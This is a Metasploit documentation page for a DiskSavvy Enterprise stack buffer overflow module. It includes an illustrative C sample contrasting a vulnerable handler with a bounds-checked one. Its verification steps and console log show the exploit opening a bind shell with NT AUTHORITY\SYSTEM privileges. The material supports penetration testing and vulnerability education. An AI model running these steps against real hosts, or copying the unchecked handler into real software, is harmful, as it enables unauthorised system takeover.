GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/disk_savvy_adm.md

## Vulnerable Application

DiskSavvy Enterprise v10.4.18 is affected by a stack-based buffer overflow caused by improper bounds checking of requests sent to its built-in server. An attacker can leverage the overflow to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at DiskSavvy Enterprise.
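The bug class above (a request length that is trusted and copied into a fixed-size stack buffer) is illustrated by the following added example. It is not DiskSavvy's code or the module's code, and the 2-byte length-prefixed wire format, the `MAX_PAYLOAD` buffer size and all function names are constructed for the illustration. The unchecked handler shows the defective pattern; the checked handler shows the bounds check that should have rejected an oversize request before any copy.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed wire format for this illustration only (not DiskSavvy's real
 * protocol): a 2-byte little-endian length field followed by that many
 * payload bytes. */
#define MAX_PAYLOAD 64          /* size of the handler's stack buffer (assumed) */
#define MAX_REQUEST 1024        /* largest packet the sample builder produces */

/* Build a request into `out` with the given declared payload length, filling
 * the payload with `fill`; returns the total bytes written. Used only to
 * construct sample inputs. */
size_t build_request(uint8_t *out, size_t declared, uint8_t fill)
{
    out[0] = (uint8_t)(declared & 0xff);
    out[1] = (uint8_t)((declared >> 8) & 0xff);
    memset(out + 2, fill, declared);
    return declared + 2;
}

/* Vulnerable pattern: the length the client declares is compared with the
 * packet size but never with the stack buffer, so a declared length above
 * MAX_PAYLOAD writes past `buf` (undefined behaviour; never call it that way). */
int handle_request_unchecked(const uint8_t *req, size_t req_len)
{
    char buf[MAX_PAYLOAD];
    if (req_len < 2)
        return -1;
    size_t declared = (size_t)req[0] | ((size_t)req[1] << 8);
    if (declared > req_len - 2)          /* truncated packet */
        return -1;
    memcpy(buf, req + 2, declared);      /* missing: check against sizeof buf */
    return (int)declared;
}

/* Hardened handler: the same parse, plus a bounds check of the declared
 * length against the buffer before any copy; oversize requests are rejected. */
int handle_request_checked(const uint8_t *req, size_t req_len)
{
    char buf[MAX_PAYLOAD];
    if (req_len < 2)
        return -1;
    size_t declared = (size_t)req[0] | ((size_t)req[1] << 8);
    if (declared > req_len - 2)          /* truncated packet */
        return -1;
    if (declared >= sizeof buf)          /* leave room for the terminator */
        return -2;
    memcpy(buf, req + 2, declared);
    buf[declared] = '\0';
    return (int)declared;
}

/* Convenience wrappers: build a request of the given payload length and run
 * it through a handler. The checked wrapper is safe for any length; the
 * unchecked wrapper refuses lengths that would trigger the overflow. */
int checked_result(size_t declared)
{
    static uint8_t req[MAX_REQUEST];
    if (declared + 2 > sizeof req)
        return -1;
    return handle_request_checked(req, build_request(req, declared, 'A'));
}

int unchecked_result_in_bounds(size_t declared)
{
    static uint8_t req[MAX_REQUEST];
    if (declared >= MAX_PAYLOAD)
        return -3;                       /* would smash the stack; not run */
    return handle_request_unchecked(req, build_request(req, declared, 'A'));
}

int main(void)
{
    printf("16-byte payload, checked handler:  %d\n", checked_result(16));
    printf("500-byte payload, checked handler: %d (rejected)\n", checked_result(500));
    printf("16-byte payload, unchecked handler: %d\n", unchecked_result_in_bounds(16));
    return 0;
}
```

The only difference between the two handlers is the `declared >= sizeof buf` comparison; without it, the declared length from the network is the sole limit on how much is written onto the stack, which is the condition the page attributes to the DiskSavvy server.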

## Verification Steps

1. Install a vulnerable DiskSavvy Enterprise
2. Start `msfconsole`
3. Do `use exploit/windows/misc/disk_savvy_adm`
4. Do `set RHOST ip`
5. Do `set PAYLOAD windows/shell/bind_tcp`
6. Do `exploit`
7. Enjoy your shell

## Scenarios

### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86

```
msf > use exploit/windows/misc/disk_savvy_adm
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
RHOST => 192.168.216.55
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(windows/misc/disk_savvy_adm) > exploit

[*] Started bind handler
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.216.55
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```